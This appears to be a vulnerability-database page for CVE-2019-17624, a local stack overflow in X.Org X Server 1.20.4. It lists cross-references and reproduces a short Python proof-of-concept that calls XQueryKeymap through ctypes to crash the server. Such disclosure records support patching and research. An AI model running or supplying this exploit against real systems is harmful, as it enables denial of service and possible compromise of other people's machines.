X.Org X Server 1.20.4 Local Stack Overflow

🗓️ 16 Oct 2019 00:00:00Reported by Marcelo VazquezType

packetstorm🔗 packetstormsecurity.com👁 194 Views

X Server 1.20.4 Local Stack Overflow CVE-2019-1762

Reporter	Title	Published	Views	Family All 13
0day.today	X.Org X Server 1.20.4 - Local Stack Overflow Exploit	16 Oct 201900:00	–	zdt
Circl	CVE-2019-17624	21 Sep 202106:42	–	circl
CVE	CVE-2019-17624	16 Oct 201910:59	–	cve
Cvelist	CVE-2019-17624	16 Oct 201910:59	–	cvelist
Exploit DB	X.Org X Server 1.20.4 - Local Stack Overflow	16 Oct 201900:00	–	exploitdb
exploitpack	X.Org X Server 1.20.4 - Local Stack Overflow	16 Oct 201900:00	–	exploitpack
NVD	CVE-2019-17624	16 Oct 201911:15	–	nvd
OSV	CVE-2019-17624	16 Oct 201911:15	–	osv
Prion	Stack overflow	16 Oct 201911:15	–	prion
Positive Technologies	PT-2022-7134 · X.Org +9 · X.Org +9	3 Jun 201900:00	–	ptsecurity

`# Exploit Title: X.Org X Server 1.20.4 - Local Stack Overflow  
# Date: 2019-10-16  
# Exploit Author: Marcelo Vázquez (aka s4vitar)  
# Vendor Homepage: https://www.x.org/  
# Version: <= 1.20.4  
# Tested on: Linux  
# CVE: CVE-2019-17624  
  
#!/usr/bin/python  
#coding: utf-8  
  
# ************************************************************************  
# * Author: Marcelo Vázquez (aka s4vitar) *  
# * X.Org X Server 1.20.4 / X Protocol Version 11 (Stack Overflow) *  
# ************************************************************************  
  
import sys, time  
import ctypes as ct  
  
from ctypes import cast  
from ctypes.util import find_library  
  
def access_violation(x11, current_display):  
keyboard = (ct.c_char * 1000)()  
x11.XQueryKeymap(current_display, keyboard)  
  
if __name__ == '__main__':  
  
print "\n[*] Loading x11...\n"  
time.sleep(2)  
  
x11 = ct.cdll.LoadLibrary(find_library("X11"))  
current_display = x11.XOpenDisplay(None)  
  
print "[*] Exploiting...\n"  
time.sleep(1)  
  
try:  
access_violation(x11, current_display)  
  
except:  
print "\nError...\n"  
sys.exit(1)  
`

16 Oct 2019 00:00Current

EPSS0.16233